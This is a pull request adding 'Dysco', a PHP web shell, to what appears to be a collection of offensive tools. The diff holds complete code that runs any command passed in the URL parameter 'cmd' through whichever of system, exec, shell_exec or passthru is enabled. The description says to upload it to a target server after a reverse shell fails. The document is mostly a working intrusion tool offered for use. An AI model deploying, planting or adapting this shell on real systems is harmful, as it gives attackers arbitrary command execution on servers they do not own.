### PR TITLE
Add Dysco(Dynamic PHP Shell Command for RCE)

### DIFF
--- a/Web-Shells/PHP/Dysco.php
+++ b/Web-Shells/PHP/Dysco.php
@@ -1,0 +1,59 @@
+<?php
+
+/*
+ * Dysco(Dynamic PHP Shell Command for RCE)
+ * Created by Petruknisme @2020
+ * Contact: me@petruknisme.com
+ */
+
+
+function Dysco($command)
+{
+    $list_function_shell = array("system", "exec", "shell_exec", "passthru", "eval");
+    $f_enabled = array_filter($list_function_shell, 'function_exists');
+    
+    echo "Enabled Function:\n<br/>";
+    foreach($f_enabled as $f)
+    {
+        echo $f." ";
+    }
+
+    if($f_enabled !== ""){
+        $f = $f_enabled[0];
+        echo "<br/>\nUsing ". $f. " as shell command\n<br/>";
+         
+        if($f == "system" || $f == "passthru"){
+            // disable multiple output for system
+            ob_start();
+            $output =  $f($command, $status);
+            ob_clean(); 
+        }
+        else if($f == "exec"){
+            $f($command, $output, $status);
+            $output = implode("n", $output);
+        }
+        else if($f == "shell_exec"){
+            $output = $f($command);
+        }
+        else{
+            $output = "Command execution not possible. All supported function is disabled.";
+            $status = 1;
+        }
+ 
+    }
+	
+    return array('output' => $output , 'status' => $status);
+}
+
+// for HTTP GET use this.
+
+if(isset($_GET['cmd'])){
+    $o = Dysco($_GET['cmd']);
+    echo $o['output'];
+}
+
+// for debugging in local, use this
+
+//$o = shell_spawn('uname -a');
+//echo $o['output'];
+?>


### PR DESCRIPTION
Dysco(Dynamic PHP Shell Command for RCE). This is example PHP Shell with support for dynamic RCE command, it's useful when you are don't know which php function is disabled.

# Why

When You are uploading php reverse shell and it doesn't give you reverse shell without any reason? You only have one chance to upload shell, don't waste your time. Use this, it will use and check available command and then run your requested command.

# Supported Function

- exec
- shell_exec
- system
- passthru
- eval
- More soon

# Usage

Upload this to your target and then open script:

http://blablabla.com/dysco.php?cmd=your_command_execution

Repo: https://github.com/aancw/Dysco/